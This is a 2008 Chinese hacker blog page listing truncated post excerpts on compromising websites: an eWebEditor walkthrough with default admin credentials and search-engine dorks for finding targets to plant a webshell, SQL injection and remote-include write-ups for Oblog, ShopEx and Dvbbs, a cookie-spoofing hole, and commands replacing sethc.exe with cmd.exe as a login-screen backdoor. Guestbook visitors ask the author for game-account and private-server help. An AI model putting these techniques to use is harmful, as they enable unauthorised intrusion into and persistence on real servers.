Ice
百度首页 | 百度空间
 
留言板
给他留言
  
9
哥哥~~`我有比较麻烦的事。关于私服的,帮帮我好吗?非常感谢。加我QQ好吗?124965597
2008-06-02 11:50
 
8
哥哥 加我QQ250957106   有事问问你 好吗?
2008-04-29 06:40
 
7
你好 问一下 你能给我申请几个韩国DO游戏帐号吗?   万分感谢
2008-04-27 22:12
 
6
木JJ的家伙! 找留言板俺找了半天!
哇塞! 你黑客耶?
膜拜下牛淫!阿弥陀佛! 膜拜牛淫!阿弥陀佛! 膜拜牛淫!阿弥陀佛! 膜拜牛淫!
俺走了! 不用送我了.我开拖拉机来滴 老有钱了! 天天吃方便面 喝饮尿!!!

2008-03-25 17:56
 
5
我在等待大哥能和我真心的成为朋友啊!!!以心相带!!!
2008-03-21 10:52
 
留言(6条)>>
 
姓 名:    注册
网 址: (选填)
内 容:
验证码:
 
   
 
文章列表
  
BLOG
2008-04-03 13:47
换地址了             www.xuejiice.cn
类别:默认分类 | 评论(0) | 浏览()
 
eWebEditor漏洞获webshell拿服务器全过程
2008-03-20 14:58

第一步,搜索攻击目标

  打开搜索引擎,搜索“Pragram by Dlog”,可以找到许多博客页面,这些博客都是使用“Dlog破废墟修改版”建立的。我们要找的叶面是存在暴库漏洞的1.2版本。许多用户都忽视了这个版本中内

阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
利用eWebEditor获得WebShell//eWebEditor漏洞获webshell拿服务器全过程//当ewebeditor数据库为只读时
2008-03-20 14:57

我靠 今天纯属见鬼了 。。。拿了个站的eWebEditor 居然上传文件有,但是 你打开说该页无法显示

晕死

现在eWebSoft在线编辑器用户越来越多,危害就越来越大~
首先介绍编辑器的一些默认特征:
默认登陆admin_login.asp
默认数据库db/ewebeditor.mdb
默认帐号admin 密码admin或admin888

搜索关键字:"inurl:ewebeditor" 关键字十分重要
有人搜索"eWebEditor - eWebSoft在线编辑器"
根本搜索不到几个~

baidu.google搜索inurl:ewebeditor

阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
ShopEx PHP远程包含漏洞
2008-03-19 15:52
影响版本:4.7及以下

verifycode.php

<?php
/**
*
* 登陆验证码生成文件
*
* @package ShopEx网上商店系统
* @version 4.6
* @author ShopEx.cn <develop@shopex.cn>
* @url http://www.shopex.cn/
* @since PHP 4.3
* @copyright ShopEx.cn
*
**/
if (!defined("ISSHOP
阅读全文>>
类别:默认分类 | 评论(1) | 浏览()
 
免密码进入服务器 系统本身后门
2008-03-18 17:39
## LOOK ##
­
copy cmd.exe acmd.exe
copy sethc.exe asethc.exe
del sethc.exe
ren acmd.exe sethc.exe
­
­
­
­
­
阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
最新Oblog4.6注入漏洞分析之二
2008-03-15 08:13

Date:2008-2-15
Author:Yamato[BCT]
Version:Oblog 4.6

漏洞文件User_Address.asp: If oblog.l_Group(17,0)=0 Then //第4行 有等级限制
   oblog.AddErrStr ("您目前所属的等级不允许使用通讯录功能")
oblog.showUserErr
Response.End
End if
。。。。。。
addrId=Request("id") //第15行
If addrId<>"" And InStr(addrid,",")<=0 Then addrId=Int(addrId)
。。。。。。
Case "add","edit

阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
最新Oblog4.6注入漏洞分析
2008-03-13 23:31

Date:2008-2-15
Author:Yamato[BCT]
Version:Oblog 4.6

漏洞文件AjaxServer.asp: Sub digglog() //第691行
If Not lcase(Request.ServerVariables("REQUEST_METHOD"))="post" Then Response.End
。。。。。。
If request("ptrue")=1 Then //第703行
   pdigg=oblog.checkuserlogined_digg(unescape(Trim(request("puser"))),Trim(request("ppass")))
oblog.checkuserlogined_digg在/inc/ class_sys.asp文件下:
Public

阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
dvbbs之PHP版本0day
2008-03-13 23:31

来源:鬼仔's Blog

影响版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息来源:零客网安 www.0kee.com

Dvbbs PHP 0day

相关代码: function brule() {
   global $dv,$db,$boardid,$lang,$groupboardid;
   $groupboardid=$_GET['groupboardid'];
   if(!empty($_GET['groupboardid'])){
     $rules=$db->scalar("select ru

阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞
2008-03-13 23:30
代码http://www.venshop.com/down/venshop.rar
小程序,备忘一下
ad_chk.asp判断管理员登陆状态 <%
if Request.Cookies("venshop")("admin_name")="" or Request.Cookies("venshop")("admin_pass")="" or Request.Cookies("venshop")("admin_class")="" then
Response.Cookies("venshop")("admin_name")=""
阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
本 BLOG 停止 更新
2008-03-10 16:53

本 BLOG 停止 更新  

类别:默认分类 | 评论(1) | 浏览()
 
更多文章>>
     
 
 
背景音乐
  
 
文章分类
  
默认分类(84)
 
     
 
我的好友
  
   
 
日历
  
     
 
最新评论
    
文章评论|照片评论


wqtfgrebtgf
 

测试成功了 ?
 

嗷嗷郁闷
 

- -! 2个是加密的,我感觉是刺客的
你解下
 

汗,我哪是什么高手
 
更多评论>>
     
 
最近访客
  
 

Reevet
无奈啊神

nosharp
陈庄六一

huxingru123
lizi_ynt

fywh62
huang5466
     
 
RSS订阅
  
用户未订阅RSS信息
   


©2008 Baidu